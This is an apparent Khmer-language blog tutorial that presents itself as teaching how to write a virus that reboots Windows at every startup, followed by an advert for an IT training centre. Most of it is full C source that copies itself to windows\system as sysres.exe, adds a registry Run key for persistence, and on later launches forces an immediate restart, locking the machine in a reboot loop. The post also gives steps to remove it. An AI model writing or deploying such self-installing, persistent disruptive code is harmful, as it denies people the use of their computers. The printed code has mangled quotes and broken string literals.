បង្កើតមេរោគ Restart កុំព្យូទ័រ Startup

សរសេរកូដបង្កើត មេរោគ Restart កុំព្យូទ័រ រាល់ពេល បើក Startup Windows
ការសរសេរដោយប្រើកម្មវិធី C ដើម្បីសរសេរ និង compile ជាមេរោគ

a

ចូលដោនឡូត Source Code  ទីនេះ 

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

 

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

 

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

តែសសាកល្បង រួចហើយ Remove មេរោគចេញ ពីកុំព្យូទ័រ

លោកអ្នក compile សាកល្បង រួចហើយ មេរោគនេះ ក្នុងកុំព្យូទ័ររបស់អ្នក ដោយចុចពីរដងលើ sysres.exe file រួចហើយ restart system ពេលនោះគ្រប់ពេលកុំព្យូទ័រ boot  restart ដោយស្វ័យប្រវត្តិម្តងហើយម្តងទៀត។ ខាងក្រោមនេះជំហាន remove ចេញពីកុំព្យូទ័ររបស់អ្នក

1. Reboot កុំព្យូទ័រ ជ្រើសរើស SAFE MODE
2. ចូលក្នុង X:\Windows\System (X អាចជា C,D,E ឬ F)
3.រកមើល file មួយមានឈ្មោះថា sysres.exe លប់វាចោល
4. វាយសរសេរ regedit ក្នុង run.អ្នកនឹងចូលដល់ registry editor​ ដែលមាន

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run 

នៅខាងស្តាំដៃ បញ្ជីឈ្មោះ  “sres“.លប់ចោលចេញពីលើវា  ពេលនោះលោកអ្នកបាន remove ចេញជោគជ័យ។

វិធីឡូស៊ីច LOGIC:
1.ដំបូងមេរោគ និងរក Root partition (Partition លើ Windows ត្រូវបានដំឡើង).
2. បន្ទាប់មកមេរោគ Virus file គឺចំលងចូល X:\Windows\System
3. ប្រសិនបើមិនដូច្នោះមេរោគបានតោងជាប់ X:\Windows\System បង្កើតលើ registry entry ចូលក្នុង startup។

——————————————————————————————————

មជ្ឈមណ្ឌល អាយធី ខេប៊ូ-IT CAMBO

សរសេរកម្មវិធី:
– រចនាវ៉ិបសាយ & Hosting គ្រប់គ្រងក្រុមហ៊ុន…
– បង្កើតកម្មវិធីគ្រប់គ្រងទិន្នន័យ
– ដំឡើងប្រព័ន្ធ ណែតវឺក Networking

កម្មវិធីសិក្សាបើកវគ្គខ្លី(សិស្សចាប់ពី ១០ឡើងទៅ)
–  វគ្គរចនាវ៉ិបសាយ HTML,CSS, Javascript, PHP, ASP.NET
–  វគ្គដំឡើងកុំព្យូទ័រណែតវឺក Networking
–   វគ្គជួសជុលកុំព្យូទ័រ Computer Repairing
–   វគ្គសរសេរកម្មវិធីលើ iOS (កម្មវិធី iPhone, iPAD)

ទំនាក់ទំ​នង លោក ទាវ​ ឈុន ណន: 0977778647-077778647-070778647
Email: chhunnan@gmail.com
Chat: yahoo, skype: chhunnan
www.itcambo.com
ITCAMBO-NEW